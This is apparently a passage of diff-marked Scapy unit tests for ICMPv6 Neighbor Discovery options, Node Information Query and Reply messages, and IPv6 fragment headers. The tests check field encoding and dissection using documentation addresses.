-a=ICMPv6NDOptRDNSS(b'\x19\x01\x00\x00\xff\xff\xff\xff') -a.type==25 and a.len==1 and a.res == 0 and a.dns==[] - -= ICMPv6NDOptRDNSS - Dissection (with 1 DNS address) -a=ICMPv6NDOptRDNSS(b'\x19\x03\x00\x00\xff\xff\xff\xff \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01') -a.type==25 and a.len==3 and a.res ==0 and len(a.dns) == 1 and a.dns[0] == "2001:db8::1" - -= ICMPv6NDOptRDNSS - Dissection (with 2 DNS addresses) -a=ICMPv6NDOptRDNSS(b'\x19\x05\xaa\xee\xff\xff\xff\xff \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02') -a.type==25 and a.len==5 and a.res == 0xaaee and len(a.dns) == 2 and a.dns[0] == "2001:db8::1" and a.dns[1] == "2001:db8::2" - -= ICMPv6NDOptRDNSS - Summary Output -a=ICMPv6NDOptRDNSS(b'\x19\x05\xaa\xee\xff\xff\xff\xff \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02') -a.mysummary() == "ICMPv6 Neighbor Discovery Option - Recursive DNS Server Option 2001:db8::1, 2001:db8::2" - - -############ -############ -+ ICMPv6NDOptDNSSL Class Test - -= ICMPv6NDOptDNSSL - Basic Instantiation -raw(ICMPv6NDOptDNSSL()) == b'\x1f\x01\x00\x00\xff\xff\xff\xff' - -= ICMPv6NDOptDNSSL - Instantiation with 1 search domain, as seen in the wild -raw(ICMPv6NDOptDNSSL(lifetime=60, searchlist=["home."])) == b'\x1f\x02\x00\x00\x00\x00\x00<\x04home\x00\x00\x00' - -= ICMPv6NDOptDNSSL - Basic instantiation with 2 search domains -raw(ICMPv6NDOptDNSSL(searchlist=["home.", "office."])) == b'\x1f\x03\x00\x00\xff\xff\xff\xff\x04home\x00\x06office\x00\x00\x00' - -= ICMPv6NDOptDNSSL - Basic instantiation with 3 search domains -raw(ICMPv6NDOptDNSSL(searchlist=["home.", "office.", "here.there."])) == b'\x1f\x05\x00\x00\xff\xff\xff\xff\x04home\x00\x06office\x00\x04here\x05there\x00\x00\x00\x00\x00\x00\x00' - -= ICMPv6NDOptDNSSL - Basic Dissection -p = ICMPv6NDOptDNSSL(b'\x1f\x01\x00\x00\xff\xff\xff\xff') -p.type == 31 and p.len == 1 and p.res == 0 and p.searchlist == [] - -= ICMPv6NDOptDNSSL - Basic Dissection with specific values -p = ICMPv6NDOptDNSSL(b'\x1f\x02\x00\x00\x00\x00\x00<\x04home\x00\x00\x00') -p.type == 31 and p.len == 2 and p.res == 0 and p.lifetime == 60 and p.searchlist == ["home."] - -= ICMPv6NDOptDNSSL - Summary Output -ICMPv6NDOptDNSSL(searchlist=["home.", "office."]).mysummary() == "ICMPv6 Neighbor Discovery Option - DNS Search List Option home., office." - - -############ -############ -+ ICMPv6NDOptEFA Class Test - -= ICMPv6NDOptEFA - Basic Instantiation -raw(ICMPv6NDOptEFA()) == b'\x1a\x01\x00\x00\x00\x00\x00\x00' - -= ICMPv6NDOptEFA - Basic Dissection -a=ICMPv6NDOptEFA(b'\x1a\x01\x00\x00\x00\x00\x00\x00') -a.type==26 and a.len==1 and a.res == 0 - - -############ -############ -+ Test Node Information Query - ICMPv6NIQueryNOOP - -= ICMPv6NIQueryNOOP - Basic Instantiation -raw(ICMPv6NIQueryNOOP(nonce=b"\x00"*8)) == b'\x8b\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' - -= ICMPv6NIQueryNOOP - Basic Dissection -a = ICMPv6NIQueryNOOP(b'\x8b\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') -a.type == 139 and a.code == 1 and a.cksum == 0 and a.qtype == 0 and a.unused == 0 and a.flags == 0 and a.nonce == b"\x00"*8 and a.data == b"" - - -############ -############ -+ Test Node Information Query - ICMPv6NIQueryName - -= ICMPv6NIQueryName - single label DNS name (internal) -a=ICMPv6NIQueryName(data="abricot").getfieldval("data") -type(a) is tuple and len(a) == 2 and a[0] == 1 and a[1] == b'\x07abricot\x00\x00' - -= ICMPv6NIQueryName - single label DNS name -ICMPv6NIQueryName(data="abricot").data == b"abricot" - -= ICMPv6NIQueryName - fqdn (internal) -a=ICMPv6NIQueryName(data="n.d.org").getfieldval("data") -type(a) is tuple and len(a) == 2 and a[0] == 1 and a[1] == b'\x01n\x01d\x03org\x00' - -= ICMPv6NIQueryName - fqdn -ICMPv6NIQueryName(data="n.d.org").data == b"n.d.org" - -= ICMPv6NIQueryName - IPv6 address (internal) -a=ICMPv6NIQueryName(data="2001:db8::1").getfieldval("data") -type(a) is tuple and len(a) == 2 and a[0] == 0 and a[1] == '2001:db8::1' - -= ICMPv6NIQueryName - IPv6 address -ICMPv6NIQueryName(data="2001:db8::1").data == "2001:db8::1" - -= ICMPv6NIQueryName - IPv4 address (internal) -a=ICMPv6NIQueryName(data="169.254.253.252").getfieldval("data") -type(a) is tuple and len(a) == 2 and a[0] == 2 and a[1] == '169.254.253.252' - -= ICMPv6NIQueryName - IPv4 address -ICMPv6NIQueryName(data="169.254.253.252").data == '169.254.253.252' - -= ICMPv6NIQueryName - build & dissection -s = raw(IPv6()/ICMPv6NIQueryName(data="n.d.org")) -p = IPv6(s) -ICMPv6NIQueryName in p and p[ICMPv6NIQueryName].data == b"n.d.org" - -= ICMPv6NIQueryName - dissection -s = b'\x8b\x00z^\x00\x02\x00\x00\x00\x03g\x90\xc7\xa3\xdd[\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' -p = ICMPv6NIQueryName(s) -p.show() -assert ICMPv6NIQueryName in p and p.data == "ff02::1" - - -############ -############ -+ Test Node Information Query - ICMPv6NIQueryIPv6 - -= ICMPv6NIQueryIPv6 - single label DNS name (internal) -a = ICMPv6NIQueryIPv6(data="abricot") -ls(a) -a = a.getfieldval("data") -type(a) is tuple and len(a) == 2 and a[0] == 1 and a[1] == b'\x07abricot\x00\x00' - -= ICMPv6NIQueryIPv6 - single label DNS name -ICMPv6NIQueryIPv6(data="abricot").data == b"abricot" - -= ICMPv6NIQueryIPv6 - fqdn (internal) -a=ICMPv6NIQueryIPv6(data="n.d.org").getfieldval("data") -type(a) is tuple and len(a) == 2 and a[0] == 1 and a[1] == b'\x01n\x01d\x03org\x00' - -= ICMPv6NIQueryIPv6 - fqdn -ICMPv6NIQueryIPv6(data="n.d.org").data == b"n.d.org" - -= ICMPv6NIQueryIPv6 - IPv6 address (internal) -a=ICMPv6NIQueryIPv6(data="2001:db8::1").getfieldval("data") -type(a) is tuple and len(a) == 2 and a[0] == 0 and a[1] == '2001:db8::1' - -= ICMPv6NIQueryIPv6 - IPv6 address -ICMPv6NIQueryIPv6(data="2001:db8::1").data == "2001:db8::1" - -= ICMPv6NIQueryIPv6 - IPv4 address (internal) -a=ICMPv6NIQueryIPv6(data="169.254.253.252").getfieldval("data") -type(a) is tuple and len(a) == 2 and a[0] == 2 and a[1] == '169.254.253.252' - -= ICMPv6NIQueryIPv6 - IPv4 address -ICMPv6NIQueryIPv6(data="169.254.253.252").data == '169.254.253.252' - - -############ -############ -+ Test Node Information Query - ICMPv6NIQueryIPv4 - -= ICMPv6NIQueryIPv4 - single label DNS name (internal) -a=ICMPv6NIQueryIPv4(data="abricot").getfieldval("data") -type(a) is tuple and len(a) == 2 and a[0] == 1 and a[1] == b'\x07abricot\x00\x00' - -= ICMPv6NIQueryIPv4 - single label DNS name -ICMPv6NIQueryIPv4(data="abricot").data == b"abricot" - -= ICMPv6NIQueryIPv4 - fqdn (internal) -a=ICMPv6NIQueryIPv4(data="n.d.org").getfieldval("data") -type(a) is tuple and len(a) == 2 and a[0] == 1 and a[1] == b'\x01n\x01d\x03org\x00' - -= ICMPv6NIQueryIPv4 - fqdn -ICMPv6NIQueryIPv4(data="n.d.org").data == b"n.d.org" - -= ICMPv6NIQueryIPv4 - IPv6 address (internal) -a=ICMPv6NIQueryIPv4(data="2001:db8::1").getfieldval("data") -type(a) is tuple and len(a) == 2 and a[0] == 0 and a[1] == '2001:db8::1' - -= ICMPv6NIQueryIPv4 - IPv6 address -ICMPv6NIQueryIPv4(data="2001:db8::1").data == "2001:db8::1" - -= ICMPv6NIQueryIPv4 - IPv4 address (internal) -a=ICMPv6NIQueryIPv4(data="169.254.253.252").getfieldval("data") -type(a) is tuple and len(a) == 2 and a[0] == 2 and a[1] == '169.254.253.252' - -= ICMPv6NIQueryIPv4 - IPv4 address -ICMPv6NIQueryIPv4(data="169.254.253.252").data == '169.254.253.252' - -= ICMPv6NIQueryIPv4 - dissection -s = b'\x8b\x01\x00\x00\x00\x04\x00\x00\xc2\xb9\xc2\x96\xc3\xa1.H\x07freebsd\x00\x00' -p = ICMPv6NIQueryIPv4(s) -p.show() -assert ICMPv6NIQueryIPv4 in p and p.data == b"freebsd" - -= ICMPv6NIQueryIPv4 - hashret() - -random.seed(0x2807) -p = IPv6(src="::", dst="::")/ICMPv6NIQueryIPv4(data="freebsd") -h = p.hashret() -h -assert h in [ - b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00:g\x02f1\xbd?\xb3\xc4', - b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00:\x88\xccb\x19~\x9e\xe3a', - b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00:$#\xb5\xb7\xd0\xbf \xe2' -] - - -############ -############ -+ Test Node Information Query - Flags tests - -= ICMPv6NIQuery* - flags handling (Test 1) -t = ICMPv6NIQueryIPv6(flags="T") -a = ICMPv6NIQueryIPv6(flags="A") -c = ICMPv6NIQueryIPv6(flags="C") -l = ICMPv6NIQueryIPv6(flags="L") -s = ICMPv6NIQueryIPv6(flags="S") -g = ICMPv6NIQueryIPv6(flags="G") -allflags = ICMPv6NIQueryIPv6(flags="TALCLSG") -t.flags == 1 and a.flags == 2 and c.flags == 4 and l.flags == 8 and s.flags == 16 and g.flags == 32 and allflags.flags == 63 - - -= ICMPv6NIQuery* - flags handling (Test 2) -t = raw(ICMPv6NIQueryNOOP(flags="T", nonce="A"*8))[6:8] -a = raw(ICMPv6NIQueryNOOP(flags="A", nonce="A"*8))[6:8] -c = raw(ICMPv6NIQueryNOOP(flags="C", nonce="A"*8))[6:8] -l = raw(ICMPv6NIQueryNOOP(flags="L", nonce="A"*8))[6:8] -s = raw(ICMPv6NIQueryNOOP(flags="S", nonce="A"*8))[6:8] -g = raw(ICMPv6NIQueryNOOP(flags="G", nonce="A"*8))[6:8] -allflags = raw(ICMPv6NIQueryNOOP(flags="TALCLSG", nonce="A"*8))[6:8] -t == b'\x00\x01' and a == b'\x00\x02' and c == b'\x00\x04' and l == b'\x00\x08' and s == b'\x00\x10' and g == b'\x00\x20' and allflags == b'\x00\x3F' - - -= ICMPv6NIReply* - flags handling (Test 1) -t = ICMPv6NIReplyIPv6(flags="T") -a = ICMPv6NIReplyIPv6(flags="A") -c = ICMPv6NIReplyIPv6(flags="C") -l = ICMPv6NIReplyIPv6(flags="L") -s = ICMPv6NIReplyIPv6(flags="S") -g = ICMPv6NIReplyIPv6(flags="G") -allflags = ICMPv6NIReplyIPv6(flags="TALCLSG") -t.flags == 1 and a.flags == 2 and c.flags == 4 and l.flags == 8 and s.flags == 16 and g.flags == 32 and allflags.flags == 63 - - -= ICMPv6NIReply* - flags handling (Test 2) -t = raw(ICMPv6NIReplyNOOP(flags="T", nonce="A"*8))[6:8] -a = raw(ICMPv6NIReplyNOOP(flags="A", nonce="A"*8))[6:8] -c = raw(ICMPv6NIReplyNOOP(flags="C", nonce="A"*8))[6:8] -l = raw(ICMPv6NIReplyNOOP(flags="L", nonce="A"*8))[6:8] -s = raw(ICMPv6NIReplyNOOP(flags="S", nonce="A"*8))[6:8] -g = raw(ICMPv6NIReplyNOOP(flags="G", nonce="A"*8))[6:8] -allflags = raw(ICMPv6NIReplyNOOP(flags="TALCLSG", nonce="A"*8))[6:8] -t == b'\x00\x01' and a == b'\x00\x02' and c == b'\x00\x04' and l == b'\x00\x08' and s == b'\x00\x10' and g == b'\x00\x20' and allflags == b'\x00\x3F' - - -= ICMPv6NIQuery* - Flags Default values -a = ICMPv6NIQueryNOOP() -b = ICMPv6NIQueryName() -c = ICMPv6NIQueryIPv4() -d = ICMPv6NIQueryIPv6() -a.flags == 0 and b.flags == 0 and c.flags == 0 and d.flags == 62 - -= ICMPv6NIReply* - Flags Default values -a = ICMPv6NIReplyIPv6() -b = ICMPv6NIReplyName() -c = ICMPv6NIReplyIPv6() -d = ICMPv6NIReplyIPv4() -e = ICMPv6NIReplyRefuse() -f = ICMPv6NIReplyUnknown() -a.flags == 0 and b.flags == 0 and c.flags == 0 and d.flags == 0 and e.flags == 0 and f.flags == 0 - - - -# Nonces -# hashret and answers -# payload guess -# automatic destination address computation when integrated in scapy6 -# at least computeNIGroupAddr - - -############ -############ -+ Test Node Information Query - Dispatching - -= ICMPv6NIQueryIPv6 - dispatch with nothing in data -s = raw(IPv6(src="2001:db8::1", dst="2001:db8::2")/ICMPv6NIQueryIPv6()) -p = IPv6(s) -isinstance(p.payload, ICMPv6NIQueryIPv6) - -= ICMPv6NIQueryIPv6 - dispatch with IPv6 address in data -s = raw(IPv6(src="2001:db8::1", dst="2001:db8::2")/ICMPv6NIQueryIPv6(data="2001::db8::1")) -p = IPv6(s) -isinstance(p.payload, ICMPv6NIQueryIPv6) - -= ICMPv6NIQueryIPv6 - dispatch with IPv4 address in data -s = raw(IPv6(src="2001:db8::1", dst="2001:db8::2")/ICMPv6NIQueryIPv6(data="192.168.0.1")) -p = IPv6(s) -isinstance(p.payload, ICMPv6NIQueryIPv6) - -= ICMPv6NIQueryIPv6 - dispatch with name in data -s = raw(IPv6(src="2001:db8::1", dst="2001:db8::2")/ICMPv6NIQueryIPv6(data="alfred")) -p = IPv6(s) -isinstance(p.payload, ICMPv6NIQueryIPv6) - -= ICMPv6NIQueryName - dispatch with nothing in data -s = raw(IPv6(src="2001:db8::1", dst="2001:db8::2")/ICMPv6NIQueryName()) -p = IPv6(s) -isinstance(p.payload, ICMPv6NIQueryName) - -= ICMPv6NIQueryName - dispatch with IPv6 address in data -s = raw(IPv6(src="2001:db8::1", dst="2001:db8::2")/ICMPv6NIQueryName(data="2001:db8::1")) -p = IPv6(s) -isinstance(p.payload, ICMPv6NIQueryName) - -= ICMPv6NIQueryName - dispatch with IPv4 address in data -s = raw(IPv6(src="2001:db8::1", dst="2001:db8::2")/ICMPv6NIQueryName(data="192.168.0.1")) -p = IPv6(s) -isinstance(p.payload, ICMPv6NIQueryName) - -= ICMPv6NIQueryName - dispatch with name in data -s = raw(IPv6(src="2001:db8::1", dst="2001:db8::2")/ICMPv6NIQueryName(data="alfred")) -p = IPv6(s) -isinstance(p.payload, ICMPv6NIQueryName) - -= ICMPv6NIQueryIPv4 - dispatch with nothing in data -s = raw(IPv6(src="2001:db8::1", dst="2001:db8::2")/ICMPv6NIQueryIPv4()) -p = IPv6(s) -isinstance(p.payload, ICMPv6NIQueryIPv4) - -= ICMPv6NIQueryIPv4 - dispatch with IPv6 address in data -s = raw(IPv6(src="2001:db8::1", dst="2001:db8::2")/ICMPv6NIQueryIPv4(data="2001:db8::1")) -p = IPv6(s) -isinstance(p.payload, ICMPv6NIQueryIPv4) - -= ICMPv6NIQueryIPv4 - dispatch with IPv6 address in data -s = raw(IPv6(src="2001:db8::1", dst="2001:db8::2")/ICMPv6NIQueryIPv4(data="192.168.0.1")) -p = IPv6(s) -isinstance(p.payload, ICMPv6NIQueryIPv4) - -= ICMPv6NIQueryIPv4 - dispatch with name in data -s = raw(IPv6(src="2001:db8::1", dst="2001:db8::2")/ICMPv6NIQueryIPv4(data="alfred")) -p = IPv6(s) -isinstance(p.payload, ICMPv6NIQueryIPv4) - -= ICMPv6NIReplyName - dispatch -s = raw(IPv6(src="2001:db8::1", dst="2001:db8::2")/ICMPv6NIReplyName()) -p = IPv6(s) -isinstance(p.payload, ICMPv6NIReplyName) - -= ICMPv6NIReplyIPv6 - dispatch -s = raw(IPv6(src="2001:db8::1", dst="2001:db8::2")/ICMPv6NIReplyIPv6()) -p = IPv6(s) -isinstance(p.payload, ICMPv6NIReplyIPv6) - -= ICMPv6NIReplyIPv4 - dispatch -s = raw(IPv6(src="2001:db8::1", dst="2001:db8::2")/ICMPv6NIReplyIPv4()) -p = IPv6(s) -isinstance(p.payload, ICMPv6NIReplyIPv4) - -= ICMPv6NIReplyRefuse - dispatch -s = raw(IPv6(src="2001:db8::1", dst="2001:db8::2")/ICMPv6NIReplyRefuse()) -p = IPv6(s) -isinstance(p.payload, ICMPv6NIReplyRefuse) - -= ICMPv6NIReplyUnknown - dispatch -s = raw(IPv6(src="2001:db8::1", dst="2001:db8::2")/ICMPv6NIReplyUnknown()) -p = IPv6(s) -isinstance(p.payload, ICMPv6NIReplyUnknown) - - -############ -############ -+ Test Node Information Query - ICMPv6NIReplyNOOP - -= ICMPv6NIReplyNOOP - single DNS name without hint => understood as string (internal) -a=ICMPv6NIReplyNOOP(data="abricot").getfieldval("data") -type(a) is tuple and len(a) == 2 and a[0] == 0 and a[1] == b"abricot" - -= ICMPv6NIReplyNOOP - single DNS name without hint => understood as string -ICMPv6NIReplyNOOP(data="abricot").data == b"abricot" - -= ICMPv6NIReplyNOOP - fqdn without hint => understood as string (internal) -a=ICMPv6NIReplyNOOP(data="n.d.tld").getfieldval("data") -type(a) is tuple and len(a) == 2 and a[0] == 0 and a[1] == b"n.d.tld" - -= ICMPv6NIReplyNOOP - fqdn without hint => understood as string -ICMPv6NIReplyNOOP(data="n.d.tld").data == b"n.d.tld" - -= ICMPv6NIReplyNOOP - IPv6 address without hint => understood as string (internal) -a=ICMPv6NIReplyNOOP(data="2001:0db8::1").getfieldval("data") -type(a) is tuple and len(a) == 2 and a[0] == 0 and a[1] == b"2001:0db8::1" - -= ICMPv6NIReplyNOOP - IPv6 address without hint => understood as string -ICMPv6NIReplyNOOP(data="2001:0db8::1").data == b"2001:0db8::1" - -= ICMPv6NIReplyNOOP - IPv4 address without hint => understood as string (internal) -a=ICMPv6NIReplyNOOP(data="169.254.253.010").getfieldval("data") -type(a) is tuple and len(a) == 2 and a[0] == 0 and a[1] == b"169.254.253.010" - -= ICMPv6NIReplyNOOP - IPv4 address without hint => understood as string -ICMPv6NIReplyNOOP(data="169.254.253.010").data == b"169.254.253.010" - - -############ -############ -+ Test Node Information Query - ICMPv6NIReplyName - -= ICMPv6NIReplyName - single label DNS name as a rawing (without ttl) (internal) -a=ICMPv6NIReplyName(data="abricot").getfieldval("data") -type(a) is tuple and len(a) == 2 and a[0] == 2 and type(a[1]) is list and len(a[1]) == 2 and a[1][0] == 0 and a[1][1] == b'\x07abricot\x00\x00' - -= ICMPv6NIReplyName - single label DNS name as a rawing (without ttl) -ICMPv6NIReplyName(data="abricot").data == [0, b"abricot"] - -= ICMPv6NIReplyName - fqdn name as a rawing (without ttl) (internal) -a=ICMPv6NIReplyName(data="n.d.tld").getfieldval("data") -type(a) is tuple and len(a) == 2 and a[0] == 2 and type(a[1]) is list and len(a[1]) == 2 and a[1][0] == 0 and a[1][1] == b'\x01n\x01d\x03tld\x00' - -= ICMPv6NIReplyName - fqdn name as a rawing (without ttl) -ICMPv6NIReplyName(data="n.d.tld").data == [0, b'n.d.tld'] - -= ICMPv6NIReplyName - list of 2 single label DNS names (without ttl) (internal) -a=ICMPv6NIReplyName(data=["abricot", "poire"]).getfieldval("data") -type(a) is tuple and len(a) == 2 and a[0] == 2 and type(a[1]) is list and len(a[1]) == 2 and a[1][0] == 0 and a[1][1] == b'\x07abricot\x00\x00\x05poire\x00\x00' - -= ICMPv6NIReplyName - list of 2 single label DNS names (without ttl) -ICMPv6NIReplyName(data=["abricot", "poire"]).data == [0, b"abricot", b"poire"] - -= ICMPv6NIReplyName - [ttl, single-label, single-label, fqdn] (internal) -a=ICMPv6NIReplyName(data=[42, "abricot", "poire", "n.d.tld"]).getfieldval("data") -type(a) is tuple and len(a) == 2 and a[0] == 2 and type(a[1]) is list and len(a[1]) == 2 and a[1][0] == 42 and a[1][1] == b'\x07abricot\x00\x00\x05poire\x00\x00\x01n\x01d\x03tld\x00' - -= ICMPv6NIReplyName - [ttl, single-label, single-label, fqdn] -ICMPv6NIReplyName(data=[42, "abricot", "poire", "n.d.tld"]).data == [42, b"abricot", b"poire", b"n.d.tld"] - -= ICMPv6NIReplyName - dissection - -s = b'\x8c\x00\xd1\x0f\x00\x02\x00\x00\x00\x00\xd9$\x94\x8d\xc6%\x00\x00\x00\x00\x07freebsd\x00\x00' -p = ICMPv6NIReplyName(s) -p.show() -assert ICMPv6NIReplyName in p and p.data == [0, b'freebsd'] - - -############ -############ -+ Test Node Information Query - ICMPv6NIReplyIPv6 - -= ICMPv6NIReplyIPv6 - one IPv6 address without TTL (internal) -a=ICMPv6NIReplyIPv6(data="2001:db8::1").getfieldval("data") -type(a) is tuple and len(a) == 2 and a[0] == 3 and type(a[1]) is list and len(a[1]) == 1 and type(a[1][0]) is tuple and len(a[1][0]) == 2 and a[1][0][0] == 0 and a[1][0][1] == "2001:db8::1" - -= ICMPv6NIReplyIPv6 - one IPv6 address without TTL -ICMPv6NIReplyIPv6(data="2001:db8::1").data == [(0, '2001:db8::1')] - -= ICMPv6NIReplyIPv6 - one IPv6 address without TTL (as a list) (internal) -a=ICMPv6NIReplyIPv6(data=["2001:db8::1"]).getfieldval("data") -type(a) is tuple and len(a) == 2 and a[0] == 3 and type(a[1]) is list and len(a[1]) == 1 and type(a[1][0]) is tuple and len(a[1][0]) == 2 and a[1][0][0] == 0 and a[1][0][1] == "2001:db8::1" - -= ICMPv6NIReplyIPv6 - one IPv6 address without TTL (as a list) -ICMPv6NIReplyIPv6(data=["2001:db8::1"]).data == [(0, '2001:db8::1')] - -= ICMPv6NIReplyIPv6 - one IPv6 address with TTL (internal) -a=ICMPv6NIReplyIPv6(data=[(0, "2001:db8::1")]).getfieldval("data") -type(a) is tuple and len(a) == 2 and a[0] == 3 and type(a[1]) is list and len(a[1]) == 1 and type(a[1][0]) is tuple and len(a[1][0]) == 2 and a[1][0][0] == 0 and a[1][0][1] == "2001:db8::1" - -= ICMPv6NIReplyIPv6 - one IPv6 address with TTL -ICMPv6NIReplyIPv6(data=[(0, "2001:db8::1")]).data == [(0, '2001:db8::1')] - -= ICMPv6NIReplyIPv6 - two IPv6 addresses as a list of rawings (without TTL) (internal) -a=ICMPv6NIReplyIPv6(data=["2001:db8::1", "2001:db8::2"]).getfieldval("data") -type(a) is tuple and len(a) == 2 and a[0] == 3 and type(a[1]) is list and len(a[1]) == 2 and type(a[1][0]) is tuple and len(a[1][0]) == 2 and a[1][0][0] == 0 and a[1][0][1] == "2001:db8::1" and len(a[1][1]) == 2 and a[1][1][0] == 0 and a[1][1][1] == "2001:db8::2" - -= ICMPv6NIReplyIPv6 - two IPv6 addresses as a list of rawings (without TTL) -ICMPv6NIReplyIPv6(data=["2001:db8::1", "2001:db8::2"]).data == [(0, '2001:db8::1'), (0, '2001:db8::2')] - -= ICMPv6NIReplyIPv6 - two IPv6 addresses as a list (first with ttl, second without) (internal) -a=ICMPv6NIReplyIPv6(data=[(42, "2001:db8::1"), "2001:db8::2"]).getfieldval("data") -type(a) is tuple and len(a) == 2 and a[0] == 3 and type(a[1]) is list and len(a[1]) == 2 and type(a[1][0]) is tuple and len(a[1][0]) == 2 and a[1][0][0] == 42 and a[1][0][1] == "2001:db8::1" and len(a[1][1]) == 2 and a[1][1][0] == 0 and a[1][1][1] == "2001:db8::2" - -= ICMPv6NIReplyIPv6 - two IPv6 addresses as a list (first with ttl, second without) -ICMPv6NIReplyIPv6(data=[(42, "2001:db8::1"), "2001:db8::2"]).data == [(42, "2001:db8::1"), (0, "2001:db8::2")] - -= ICMPv6NIReplyIPv6 - build & dissection - -s = raw(IPv6()/ICMPv6NIReplyIPv6(data="2001:db8::1")) -p = IPv6(s) -ICMPv6NIReplyIPv6 in p and p.data == [(0, '2001:db8::1')] - -############ -############ -+ Test Node Information Query - ICMPv6NIReplyIPv4 - -= ICMPv6NIReplyIPv4 - one IPv4 address without TTL (internal) -a=ICMPv6NIReplyIPv4(data="169.254.253.252").getfieldval("data") -type(a) is tuple and len(a) == 2 and a[0] == 4 and type(a[1]) is list and len(a[1]) == 1 and type(a[1][0]) is tuple and len(a[1][0]) == 2 and a[1][0][0] == 0 and a[1][0][1] == "169.254.253.252" - -= ICMPv6NIReplyIPv4 - one IPv4 address without TTL -ICMPv6NIReplyIPv4(data="169.254.253.252").data == [(0, '169.254.253.252')] - -= ICMPv6NIReplyIPv4 - one IPv4 address without TTL (as a list) (internal) -a=ICMPv6NIReplyIPv4(data=["169.254.253.252"]).getfieldval("data") -type(a) is tuple and len(a) == 2 and a[0] == 4 and type(a[1]) is list and len(a[1]) == 1 and type(a[1][0]) is tuple and len(a[1][0]) == 2 and a[1][0][0] == 0 and a[1][0][1] == "169.254.253.252" - -= ICMPv6NIReplyIPv4 - one IPv4 address without TTL (as a list) -ICMPv6NIReplyIPv4(data=["169.254.253.252"]).data == [(0, '169.254.253.252')] - -= ICMPv6NIReplyIPv4 - one IPv4 address with TTL (internal) -a=ICMPv6NIReplyIPv4(data=[(0, "169.254.253.252")]).getfieldval("data") -type(a) is tuple and len(a) == 2 and a[0] == 4 and type(a[1]) is list and len(a[1]) == 1 and type(a[1][0]) is tuple and len(a[1][0]) == 2 and a[1][0][0] == 0 and a[1][0][1] == "169.254.253.252" - -= ICMPv6NIReplyIPv4 - one IPv4 address with TTL (internal) -ICMPv6NIReplyIPv4(data=[(0, "169.254.253.252")]).data == [(0, '169.254.253.252')] - -= ICMPv6NIReplyIPv4 - two IPv4 addresses as a list of rawings (without TTL) -a=ICMPv6NIReplyIPv4(data=["169.254.253.252", "169.254.253.253"]).getfieldval("data") -type(a) is tuple and len(a) == 2 and a[0] == 4 and type(a[1]) is list and len(a[1]) == 2 and type(a[1][0]) is tuple and len(a[1][0]) == 2 and a[1][0][0] == 0 and a[1][0][1] == "169.254.253.252" and len(a[1][1]) == 2 and a[1][1][0] == 0 and a[1][1][1] == "169.254.253.253" - -= ICMPv6NIReplyIPv4 - two IPv4 addresses as a list of rawings (without TTL) (internal) -ICMPv6NIReplyIPv4(data=["169.254.253.252", "169.254.253.253"]).data == [(0, '169.254.253.252'), (0, '169.254.253.253')] - -= ICMPv6NIReplyIPv4 - two IPv4 addresses as a list (first with ttl, second without) -a=ICMPv6NIReplyIPv4(data=[(42, "169.254.253.252"), "169.254.253.253"]).getfieldval("data") -type(a) is tuple and len(a) == 2 and a[0] == 4 and type(a[1]) is list and len(a[1]) == 2 and type(a[1][0]) is tuple and len(a[1][0]) == 2 and a[1][0][0] == 42 and a[1][0][1] == "169.254.253.252" and len(a[1][1]) == 2 and a[1][1][0] == 0 and a[1][1][1] == "169.254.253.253" - -= ICMPv6NIReplyIPv4 - two IPv4 addresses as a list (first with ttl, second without) (internal) -ICMPv6NIReplyIPv4(data=[(42, "169.254.253.252"), "169.254.253.253"]).data == [(42, "169.254.253.252"), (0, "169.254.253.253")] - -= ICMPv6NIReplyIPv4 - build & dissection - -s = raw(IPv6()/ICMPv6NIReplyIPv4(data="192.168.0.1")) -p = IPv6(s) -ICMPv6NIReplyIPv4 in p and p.data == [(0, '192.168.0.1')] - -s = raw(IPv6()/ICMPv6NIReplyIPv4(data=[(2807, "192.168.0.1")])) -p = IPv6(s) -ICMPv6NIReplyIPv4 in p and p.data == [(2807, "192.168.0.1")] - - -############ -############ -+ Test Node Information Query - ICMPv6NIReplyRefuse -= ICMPv6NIReplyRefuse - basic instantiation -raw(ICMPv6NIReplyRefuse())[:8] == b'\x8c\x01\x00\x00\x00\x00\x00\x00' - -= ICMPv6NIReplyRefuse - basic dissection -a=ICMPv6NIReplyRefuse(b'\x8c\x01\x00\x00\x00\x00\x00\x00\xf1\xe9\xab\xc9\x8c\x0by\x18') -a.type == 140 and a.code == 1 and a.cksum == 0 and a.unused == 0 and a.flags == 0 and a.nonce == b'\xf1\xe9\xab\xc9\x8c\x0by\x18' and a.data == None - - -############ -############ -+ Test Node Information Query - ICMPv6NIReplyUnknown - -= ICMPv6NIReplyUnknown - basic instantiation -raw(ICMPv6NIReplyUnknown(nonce=b'\x00'*8)) == b'\x8c\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' - -= ICMPv6NIReplyRefuse - basic dissection -a=ICMPv6NIReplyRefuse(b'\x8c\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') -a.type == 140 and a.code == 2 and a.cksum == 0 and a.unused == 0 and a.flags == 0 and a.nonce == b'\x00'*8 and a.data == None - - -############ -############ -+ Test Node Information Query - utilities - -= computeNIGroupAddr -computeNIGroupAddr("scapy") == "ff02::2:f886:2f66" - - -############ -############ -+ IPv6ExtHdrFragment Class Test - -= IPv6ExtHdrFragment - Basic Instantiation -raw(IPv6ExtHdrFragment()) == b';\x00\x00\x00\x00\x00\x00\x00' - -= IPv6ExtHdrFragment - Instantiation with specific values -raw(IPv6ExtHdrFragment(nh=0xff, res1=0xee, offset=0x1fff, res2=1, m=1, id=0x11111111)) == b'\xff\xee\xff\xfb\x11\x11\x11\x11' - -= IPv6ExtHdrFragment - Basic Dissection 